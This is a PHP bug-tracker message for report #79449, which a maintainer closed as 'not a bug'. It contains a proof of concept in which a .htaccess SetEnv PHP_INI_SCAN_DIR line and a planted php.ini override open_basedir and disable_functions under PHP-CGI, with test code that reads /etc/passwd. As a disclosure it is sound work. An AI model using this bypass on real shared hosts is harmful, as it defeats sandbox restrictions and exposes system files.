Sec Bug->Bug #79449 [Opn->Nab]: PHP CGI Security Restrictions Bypass (open_basedir, disable_functions, ...)

From: Date: Fri, 03 Apr 2020 20:46:35 +0000
Subject: Sec Bug->Bug #79449 [Opn->Nab]: PHP CGI Security Restrictions Bypass (open_basedir, disable_functions, ...)
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-226430@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=79449&edit=1 ID: 79449 Updated by: stas@php.net Reported by: havijoori at protonmail dot com Summary: PHP CGI Security Restrictions Bypass (open_basedir, disable_functions, ...) -Status: Open +Status: Not a bug -Type: Security +Type: Bug Package: *General Issues Operating System: Linux PHP Version: 7.4.4 Block user comment: N Private report: Y New Comment: This is not a security issue, if you give your users control over the environment, they can influence the environment. Previous Comments: ------------------------------------------------------------------------ [2020-04-03 20:42:19] havijoori at protonmail dot com Description: ------------ Description : ============= One of PHP features is running PHP scripts as CGI scripts with PHP-CGI. For example in Apache http server, we can refer php scripts to PHP-CGI with mod_cgi. In this state, PHP looks for PHP_INI_SCAN_DIR environment variable to find directory containing .ini files. So if we set this environment variable befoe calling php scripts, we can rewrite default php.ini configs such as open_basedir, disable_functions and other security configs. PoC : ===== First we configure a web server which handles PHP as CGI with mod_cgi. Apache config file is something like this : -------------------- LoadModule cgi_module modules/mod_cgi.so DocumentRoot "/srv/http" <Directory "/srv/http"> AllowOverride All Require all granted </Directory> Action php-script /cgi-bin/php AddHandler php-script .php ... -------------------- And we set some security restrictions in PHP config file : -------------------- [PHP] open_basedir = /srv/http:/tmp disable_functions = phpinfo ... -------------------- Now, we test our security config with a simple test.php file : -------------------- <?php echo file_get_contents('/etc/passwd'); ?> -------------------- <b>Warning</b>: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/srv/http:/tmp) in <b>/srv/http/test.php</b> on line <b>2</b><br /> And : -------------------- <?php echo phpinfo(); ?> -------------------- <b>Warning</b>: phpinfo() has been disabled for security reasons in <b>/srv/http/test.php</b> on line <b>2</b><br /> OK, now we make a .htaccess file in /srv/http and set PHP_INI_SCAN_DIR environment variable : -------------------- SetEnv PHP_INI_SCAN_DIR /srv/http -------------------- And a php.ini file in /srv/http : -------------------- [PHP] open_basedir = / disable_functions = -------------------- Here, both security restrictions are bypassed and we can read /etc/passwd file and run phpinfo function. Tested with PHP 7.4.4 and Apache 2.4.41. Prevention : ============ To prevent this vulnerability, you can put a config like "clear_env" in PHP-FPM for PHP-CGI or remove PHP_INI_SCAN_DIR from environment variables in CGI mode. ------------------------------------------------------------------------ -- Edit this bug report at https://bugs.php.net/bug.php?id=79449&edit=1

« previous php.bugs (#226430) next »